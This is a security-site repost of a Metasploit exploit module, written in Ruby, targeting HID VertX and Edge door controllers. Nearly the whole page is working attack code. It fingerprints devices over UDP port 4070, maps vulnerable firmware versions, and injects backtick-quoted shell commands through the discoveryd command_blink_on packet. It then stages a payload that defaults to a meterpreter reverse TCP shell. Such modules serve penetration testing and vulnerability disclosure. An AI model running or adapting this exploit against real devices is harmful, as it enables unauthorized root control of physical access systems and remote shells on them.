首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HID discoveryd command_blink_on Unauthenticated Remote Command Execution
来源:metasploit.com 作者:Coles 发布时间:2018-07-09  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HID discoveryd command_blink_on Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in the discoveryd service exposed by HID VertX and Edge
        door controllers.

        This module was tested successfully on a HID Edge model EH400
        with firmware version 2.3.1.603 (Build 04/23/2012).
      },
      'Author'      =>
        [
          'Ricky "HeadlessZeke" Lawshae', # Discovery
          'coldfusion39', # VertXploit
          'Brendan Coles' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_ARMLE,
      'Privileged'  => true,
      'References'  =>
        [
          ['ZDI', '16-223'],
          ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
          ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
          ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
          ['URL', 'https://github.com/lixmk/Concierge'],
          ['URL', 'https://github.com/coldfusion39/VertXploit']
        ],
      'DisclosureDate'  => 'Mar 28 2016',
      'DefaultOptions'  =>
        {
          'WfsDelay'          => 30,
          'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'echo'
        },
      'Targets'         => [['Automatic', {}]],
      'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
      'DefaultTarget'   => 0))
    register_options [ Opt::RPORT(4070) ]
  end

  def check
    connect_udp
    udp_sock.put 'discover;013;'
    res = udp_sock.get(5)
    disconnect_udp

    if res.to_s.eql? ''
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    hid_res = parse_discovered_response res
    if hid_res[:mac].eql? ''
      vprint_error 'Malformed response'
      return CheckCode::Safe
    end

    @mac = hid_res[:mac]

    vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
    vprint_line hid_res.to_s
    report_service(
      host: rhost,
      mac: hid_res[:mac],
      port: rport,
      proto: 'udp',
      name: 'hid-discoveryd',
      info: hid_res
    )

    if hid_res[:version].to_s.eql? ''
      vprint_error "#{rhost}:#{rport} - Could not determine device version"
      return CheckCode::Detected
    end

    # Vulnerable version mappings from VertXploit
    vuln = false
    version = Gem::Version.new(hid_res[:version].to_s)
    case hid_res[:model]
    when 'E400'     # EDGEPlus
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EH400'    # EDGE EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EHS400'   # EDGE EVO Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'ES400'    # EDGEPlus Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V1000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V2000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V1000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    when 'V2000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    else
      vprint_error "#{rhost}:#{rport} - Device model was not recognized"
      return CheckCode::Detected
    end

    vuln ? CheckCode::Appears : CheckCode::Safe
  end

  def send_command(cmd)
    connect_udp

    # double escaping for echo -ne stager
    encoded_cmd = cmd.gsub("\\", "\\\\\\")

    # packet length (max 44)
    len = '044'

    # <num> of times to blink LED, if the device has a LED; else
    # <num> second to beep (very loudly) if the device does not have a LED
    num = -1 # no beep/blink ;)

    # construct packet
    req = ''
    req << 'command_blink_on;'
    req << "#{len};"
    req << "#{@mac};"
    req << "#{num}`#{encoded_cmd}`;"

    # send packet
    udp_sock.put req
    res = udp_sock.get(5)
    disconnect_udp

    unless res.to_s.start_with? 'ack;'
      fail_with Failure::UnexpectedReply, 'Malformed response'
    end
  end

  def execute_command(cmd, opts)
    # the protocol uses ';' as a separator,
    # so we issue each system command separately.
    # we're using the echo command stager which hex encodes the payload,
    # so there's no risk of replacing any ';' characters in the payload data.
    cmd.split(';').each do |c|
      send_command c
    end
  end

  def exploit
    print_status "#{rhost}:#{rport} - Connecting to target"

    check_code = check
    unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
      fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
    end

    # linemax is closer to 40,
    # however we need to account for additinal double escaping
    execute_cmdstager linemax: 30, :temp => '/tmp'
  end

  def parse_discovered_response(res)
    info = {}

    return unless res.start_with? 'discovered'

    hid_res = res.split(';')
    return unless hid_res.size == 9
    return unless hid_res[0] == 'discovered'
    return unless hid_res[1].to_i == res.length

    {
      :mac          => hid_res[2],
      :name         => hid_res[3],
      :ip           => hid_res[4],
      # ?           => hid_res[5], # '1'
      :model        => hid_res[6],
      :version      => hid_res[7],
      :version_date => hid_res[8]
    }
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·GitList 0.6.0 Argument Injecti
·HP VAN SDN Controller Root Com
·ManageEngine Exchange Reporter
·Grundig Smart Inter@ctive 3.0
·Boxoft WAV To MP3 Converter 1.
·Boxoft WAV to WMA Converter 1.
·openslp 2.0.0 Double Free
·Tor Browser < 0.3.2.10 - Use A
·ntop-ng Authentication Bypass
·Gitea 1.4.0 - Remote Code Exec
·Delta Industrial Automation CO
·Oracle WebLogic 12.1.2.0 - RMI
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved